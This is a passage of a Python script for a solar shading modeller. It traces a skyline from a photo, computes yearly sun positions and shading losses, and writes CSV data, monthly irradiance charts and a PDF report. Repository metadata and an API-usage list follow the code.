values['output_folder'] + '/' + values['location_name'], \" already exists\")\r\n except PermissionError:\r\n sg.Popup('Check that the location name, file path, and output folder path are all filled in')\r\n except FileNotFoundError:\r\n sg.Popup('File/folder not found: Check that you have provided a correct image and output folder path')\r\n\r\n else:\r\n path_Image = values['img_filepath']\r\n threshold = values['sensitivity_slider']\r\n\r\n if values['pano']:\r\n im = Image.open(path_Image).convert(\"L\")\r\n d = differentiateImageColumns(im).convert(\"RGB\")\r\n\r\n elif values['fisheye']:\r\n im = Image.open(path_Image).convert(\"L\")\r\n im = squareImage(im)\r\n lin = despherifyImage(im)\r\n d = differentiateImageColumns(lin).convert(\"RGB\")\r\n\r\n img_resized = resizeimage.resize_width(d, 360)\r\n img_resized.save(values['output_folder'] + '/' + values['location_name'] + '/' + 'ResizedImage.bmp', img_resized.format)\r\n\r\n r, imgcsv_azimuth, imgcsv_elevation = redlineImage(img_resized, threshold)\r\n\r\n # Write to csv\r\n with open(values['output_folder'] + '/' + values['location_name'] + '/' + 'ImageVectorData.csv', 'w', newline='') as img_csv_file:\r\n writer = csv.writer(img_csv_file)\r\n writer.writerow(['azimuth', 'elevation'])\r\n writer.writerows(zip(imgcsv_azimuth, imgcsv_elevation))\r\n\r\n r.show()\r\n r.save(values['output_folder'] + '/' + values['location_name'] + '/' + 'TracedImage.bmp')\r\n\r\n linspace_azimuths = imgcsv_azimuth\r\n linspace_elevations = imgcsv_elevation\r\n\r\n # Repeat code above for sensitivity tester\r\n\r\n # Draw plotting axes\r\n\r\n plt.figure(1)\r\n plt.xlim(right=360, left=0)\r\n plt.xticks(np.arange(0, 361, 30))\r\n plt.ylim(top=90, bottom=0)\r\n plt.yticks(np.arange(0, 91, 10))\r\n plt.xlabel('Azimuth from 0 to 360 degrees')\r\n plt.ylabel('Elevation from 0 to 90 degrees')\r\n plt.title('Skyline & sun path chart')\r\n\r\n # Program will iteratively compute at the user-defined interval\r\n # Not recommended to compute at intervals below 5 minutes on computers with less than 8GB RAM\r\n # 5 minutes is sufficient for fairly accurate results; 15 minutes for quick results\r\n\r\n frequency = int(values['interval_slider'])\r\n time_intervals = np.linspace(0, 525600, num=525600 // frequency, dtype=int)\r\n shade_counter = 0\r\n\r\n potential_insolation_counter = 0\r\n actual_insolation_counter = 0\r\n instant_potential_insolation = 0\r\n instant_actual_insolation = 0\r\n\r\n jan_min, feb_min, mar_min, apr_min, may_min, jun_min, jul_min, aug_min, sep_min, oct_min, nov_min, dec_min \\\r\n = [], [], [], [], [], [], [], [], [], [], [], []\r\n\r\n jan_insolation, feb_insolation, mar_insolation, apr_insolation, may_insolation, jun_insolation, jul_insolation, \\\r\n aug_insolation, sep_insolation, oct_insolation, nov_insolation, dec_insolation \\\r\n = [], [], [], [], [], [], [], [], [], [], [], []\r\n\r\n sun_azi_array = []\r\n sun_elev_array = []\r\n\r\n text_data = open(values['output_folder'] + '/' + values['location_name'] + '/' + r\"RawData.txt\", \"w\")\r\n\r\n # Begin iterative computing\r\n\r\n for time_min in time_intervals:\r\n #if time_min % 10080 == 0: # Progress meter too slow\r\n #sg.OneLineProgressMeter('Computing solar obstructions', time_min+1, 525600, 'key')\r\n\r\n day = time_min // 1440\r\n hr = (time_min - day * 1440) // 60\r\n min = (time_min - day * 1440 - hr * 60)\r\n\r\n print('\\n', day, hr, min, file=text_data)\r\n print('\\n', day, hr, min)\r\n\r\n zen_deg_rounded, azi_deg_rounded, elev_deg_rounded, night_or_day = solar_position_calc(day, hr, min)\r\n\r\n if night_or_day == 'Night':\r\n instant_actual_insolation = 0\r\n\r\n else:\r\n instant_potential_insolation = insolation(zen_deg_rounded)\r\n potential_insolation_counter = potential_insolation_counter + instant_potential_insolation\r\n\r\n if elev_deg_rounded < azimuth_to_elevation(azi_deg_rounded):\r\n instant_actual_insolation = 0\r\n print('Is shaded', file=text_data)\r\n print('Is shaded')\r\n\r\n else:\r\n instant_actual_insolation = insolation(zen_deg_rounded)\r\n actual_insolation_counter = actual_insolation_counter + instant_actual_insolation\r\n print('Is not shaded', file=text_data)\r\n print('Is not shaded')\r\n\r\n sun_azi_array.append(azi_deg_rounded)\r\n sun_elev_array.append(elev_deg_rounded)\r\n\r\n # year_chart = plt.plot(azi_deg_rounded, elev_deg_rounded, 'r,')\r\n\r\n if day == 14: # 15 Jan is day 14, starting from day 0\r\n jan_min.append((time_min - day * 1440) / 60)\r\n jan_insolation.append(instant_actual_insolation)\r\n\r\n if day == 45: # 15 Feb is day 45, from day 0\r\n feb_min.append((time_min - day * 1440) / 60)\r\n feb_insolation.append(instant_actual_insolation)\r\n\r\n if day == 73: # 15 Mar is day 73, from day 0\r\n mar_min.append((time_min - day * 1440) / 60)\r\n mar_insolation.append(instant_actual_insolation)\r\n\r\n if day == 104:\r\n apr_min.append((time_min - day * 1440) / 60)\r\n apr_insolation.append(instant_actual_insolation)\r\n\r\n if day == 134:\r\n may_min.append((time_min - day * 1440) / 60)\r\n may_insolation.append(instant_actual_insolation)\r\n\r\n if day == 165:\r\n jun_min.append((time_min - day * 1440) / 60)\r\n jun_insolation.append(instant_actual_insolation)\r\n\r\n if day == 195:\r\n jul_min.append((time_min - day * 1440) / 60)\r\n jul_insolation.append(instant_actual_insolation)\r\n\r\n if day == 226:\r\n aug_min.append((time_min - day * 1440) / 60)\r\n aug_insolation.append(instant_actual_insolation)\r\n\r\n if day == 257:\r\n sep_min.append((time_min - day * 1440) / 60)\r\n sep_insolation.append(instant_actual_insolation)\r\n\r\n if day == 287:\r\n oct_min.append((time_min - day * 1440) / 60)\r\n oct_insolation.append(instant_actual_insolation)\r\n\r\n if day == 318:\r\n nov_min.append((time_min - day * 1440) / 60)\r\n nov_insolation.append(instant_actual_insolation)\r\n\r\n if day == 348:\r\n dec_min.append((time_min - day * 1440) / 60)\r\n dec_insolation.append(instant_actual_insolation)\r\n\r\n year_chart = plt.plot(sun_azi_array, sun_elev_array, 'r,')\r\n\r\n total_potential_insolation_watts = potential_insolation_counter / len(time_intervals)\r\n total_actual_insolation_watts = actual_insolation_counter / len(time_intervals)\r\n\r\n total_potential_insolation_kwh = 1580\r\n total_actual_insolation_kwh = round((total_actual_insolation_watts / total_potential_insolation_watts) * total_potential_insolation_kwh)\r\n\r\n pct_shading_loss = ((total_potential_insolation_kwh - total_actual_insolation_kwh) * 100) / total_potential_insolation_kwh\r\n\r\n print('\\nTotal solar potential if the location is unshaded =', total_potential_insolation_kwh,\r\n 'kWh/sqm/year', file=text_data)\r\n print('\\nActual solar energy accounting for shading =', total_actual_insolation_kwh, 'kWh/sqm/year',\r\n file=text_data)\r\n print('\\nGenerating PDF report - SolarReport.pdf - file can be found in active program folder', file=text_data)\r\n\r\n print('\\nTotal solar potential if the location is unshaded =', total_potential_insolation_kwh,\r\n 'kWh/sqm/year')\r\n print('\\nActual solar energy accounting for shading =', total_actual_insolation_kwh, 'kWh/sqm/year')\r\n print('\\nGenerating PDF report - SolarReport.pdf - file can be found in active program folder')\r\n\r\n print('\\nSaving raw data text output - RawData.txt - file can be found in active program folder. This may take a while.')\r\n\r\n text_data.close()\r\n\r\n # Begin plotting functions\r\n # These functions are responsible for generating the final PDF report\r\n\r\n plt.figure(1)\r\n year_chart = plt.plot(linspace_azimuths, linspace_elevations)\r\n\r\n plt.figure(2)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 January')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n jan_chart = plt.plot(jan_min, jan_insolation)\r\n\r\n plt.figure(3)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 February')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n feb_chart = plt.plot(feb_min, feb_insolation)\r\n\r\n plt.figure(4)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 March')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n mar_chart = plt.plot(mar_min, mar_insolation)\r\n\r\n plt.figure(5)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 April')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n apr_chart = plt.plot(apr_min, apr_insolation)\r\n\r\n plt.figure(6)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 May')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n may_chart = plt.plot(may_min, may_insolation)\r\n\r\n plt.figure(7)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 June')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n jun_chart = plt.plot(jun_min, jun_insolation)\r\n\r\n plt.figure(8)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 July')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n jul_chart = plt.plot(jul_min, jul_insolation)\r\n\r\n plt.figure(9)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 August')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n aug_chart = plt.plot(aug_min, aug_insolation)\r\n\r\n plt.figure(10)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 September')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n sep_chart = plt.plot(sep_min, sep_insolation)\r\n\r\n plt.figure(11)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 October')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n oct_chart = plt.plot(oct_min, oct_insolation)\r\n\r\n plt.figure(12)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 November')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n nov_chart = plt.plot(nov_min, nov_insolation)\r\n\r\n plt.figure(13)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 December')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n dec_chart = plt.plot(dec_min, dec_insolation)\r\n\r\n plt.figure(14)\r\n plt.plot(jan_min, jan_insolation, label='Jan')\r\n plt.plot(feb_min, feb_insolation, label='Feb')\r\n plt.plot(mar_min, mar_insolation, label='Mar')\r\n plt.plot(apr_min, apr_insolation, label='Apr')\r\n plt.plot(may_min, may_insolation, label='May')\r\n plt.plot(jun_min, jun_insolation, label='Jun')\r\n plt.plot(jul_min, jul_insolation, label='Jul')\r\n plt.plot(aug_min, aug_insolation, label='Aug')\r\n plt.plot(sep_min, sep_insolation, label='Sep')\r\n plt.plot(oct_min, oct_insolation, label='Oct')\r\n plt.plot(nov_min, nov_insolation, label='Nov')\r\n plt.plot(dec_min, dec_insolation, label='Dec')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (whole year)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(15)\r\n plt.plot(jan_min, jan_insolation, label='Jan')\r\n plt.plot(feb_min, feb_insolation, label='Feb')\r\n plt.plot(mar_min, mar_insolation, label='Mar')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (1st quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(16)\r\n plt.plot(apr_min, apr_insolation, label='Apr')\r\n plt.plot(may_min, may_insolation, label='May')\r\n plt.plot(jun_min, jun_insolation, label='Jun')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (2nd quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(17)\r\n plt.plot(jul_min, jul_insolation, label='Jul')\r\n plt.plot(aug_min, aug_insolation, label='Aug')\r\n plt.plot(sep_min, sep_insolation, label='Sep')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (3rd quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(18)\r\n plt.plot(oct_min, oct_insolation, label='Oct')\r\n plt.plot(nov_min, nov_insolation, label='Nov')\r\n plt.plot(dec_min, dec_insolation, label='Dec')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (4th quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n with PdfPages(values['output_folder'] + '/' + values['location_name'] + '/' + 'SolarReport.pdf') as pdf:\r\n firstPage = plt.figure()\r\n firstPage.clf()\r\n txt0 = 'Solar shading report for location: ' + values['location_name']\r\n txt1 = 'Total solar potential if the location is unshaded = ' + str(\r\n round(total_potential_insolation_kwh)) + ' kWh/sqm/year'\r\n txt2 = 'Actual irradiance accounting for shading = ' + str(\r\n round(total_actual_insolation_kwh)) + ' kWh/sqm/year'\r\n txt3 = 'Energy loss due to shading = ' + str(round(pct_shading_loss)) + '%'\r\n firstPage.text(0.5, 0.58, txt0, transform=firstPage.transFigure, size=9, ha=\"center\")\r\n firstPage.text(0.5, 0.48, txt1, transform=firstPage.transFigure, size=8, ha=\"center\")\r\n firstPage.text(0.5, 0.52, txt2, transform=firstPage.transFigure, size=8, ha=\"center\")\r\n firstPage.text(0.5, 0.44, txt3, transform=firstPage.transFigure, size=8, ha=\"center\")\r\n pdf.savefig(firstPage)\r\n\r\n for fig in range(1, plt.gcf().number):\r\n pdf.savefig(fig)\r\n\r\n break\r\n window.Close()\r\n\r\n\r\n# Pop up a window to open the PDF report\r\n\r\nif event == 'Compute':\r\n# sg.Popup('Solar report generated at selected folder - SolarReport.pdf')\r\n\r\n layout2 = [[sg.Text('Solar report generated at selected folder - SolarReport.pdf')],\r\n [sg.Button('Open'), sg.Button('Cancel')]]\r\n\r\n window2 = sg.Window('Solar shading report generated', layout2)\r\n event2, values2 = window2.Read()\r\n\r\n while True:\r\n if event2 is None or event2 == 'Cancel':\r\n break\r\n if event2 == 'Open':\r\n os.startfile(values['output_folder'] + '/' + values['location_name'] + '/' + 'SolarReport.pdf')\r\n break\r\n window2.Close()\r\n\r\n# End of program, report generated as SolarReport.pdf in the running directory\r\n\r\n# End experimental GUI code\r\n", "repo_name": "bowenfan96/solar-shading-modeller", "sub_path": "ssm_v0.5.py", "file_name": "ssm_v0.5.py", "file_ext": "py", "file_size_in_byte": 27933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.search", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 123, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 145, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 145, "usage_type": "name"}, {"api_name": "PySimpleGUI.Text", "line_number": 186, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 186, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 187, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 187, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 188, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 188, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 189, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 189, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 190, "usage_type": "call"}, {"api_name": "PySimpleGUI.Radio", "line_number": 191, "usage_type": "call"}, {"api_name": "PySimpleGUI.Radio", "line_number": 192, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 193, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 193, "usage_type": "call"}, {"api_name": "PySimpleGUI.FileBrowse", "line_number": 194, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 195, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 195, "usage_type": "call"}, {"api_name": "PySimpleGUI.FolderBrowse", "line_number": 195, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 196, "usage_type": "call"}, {"api_name": "PySimpleGUI.Slider", "line_number": 197, "usage_type": "call"}, {"api_name": "PySimpleGUI.T", "line_number": 199, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 200, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 200, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 201, "usage_type": "call"}, {"api_name": "PySimpleGUI.Slider", "line_number": 202, "usage_type": "call"}, {"api_name": "PySimpleGUI.T", "line_number": 204, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 205, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 205, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 208, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 225, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 233, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 233, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 237, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 237, "usage_type": "name"}, {"api_name": "resizeimage.resizeimage.resize_width", "line_number": 242, "usage_type": "call"}, {"api_name": "resizeimage.resizeimage", "line_number": 242, "usage_type": "name"}, {"api_name": "PySimpleGUI.Popup", "line_number": 252, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 254, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 260, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 264, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 266, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 268, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 275, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 275, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 279, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 279, "usage_type": "name"}, {"api_name": "resizeimage.resizeimage.resize_width", "line_number": 284, "usage_type": "call"}, {"api_name": "resizeimage.resizeimage", "line_number": 284, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 309, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 453, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 456, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 456, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 458, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 459, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 459, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 460, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 460, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 461, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 463, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 463, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 465, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 465, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 465, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 466, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 467, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 467, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 468, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 470, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 470, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 471, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 471, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 472, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 473, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 473, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 475, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 477, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 477, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 478, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 479, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 480, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 484, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 486, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 489, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 489, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 491, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 492, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 492, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 493, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 494, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 494, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 495, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 495, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 496, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 496, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 499, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 499, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 500, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 502, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 502, "usage_type": "name"}, {"api_name": 